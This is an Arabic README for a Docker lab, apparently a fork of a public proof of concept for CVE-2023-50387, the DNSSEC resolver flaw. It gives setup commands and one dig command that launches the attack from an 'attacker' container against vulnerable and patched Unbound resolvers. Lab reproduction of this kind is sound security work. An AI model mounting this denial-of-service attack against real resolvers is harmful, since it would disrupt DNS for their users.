
استغلال ثغرة DNS لـ CVE-2023-50387 مع توليد مفاتيح RRSIG آلي ومحاكاة هجوم قائمة على Docker ضد حلّي Unbound المعرضين والمصححين.
مستودع مبني على https://github.com/knqyf263/CVE-2023-50387 تم إجراء عدة تعديلات عليه:
لتوليد ملفات التهيئة تلقائياً:
./generar.sh
الشروط المسبقة: النص البرمجي مكتوب لنظام Linux، يتطلب تثبيت python3 وأدوات dnssec-keygen و dnssec-signzone (على الأنظمة المبنية على Debian، في الحزمة bind9-utils).
لتفعيل الحاويات:
sudo docker-compose up --build
لشن الهجوم:
sudo docker compose exec -it attacker dig @10.10.0.3 www.a.test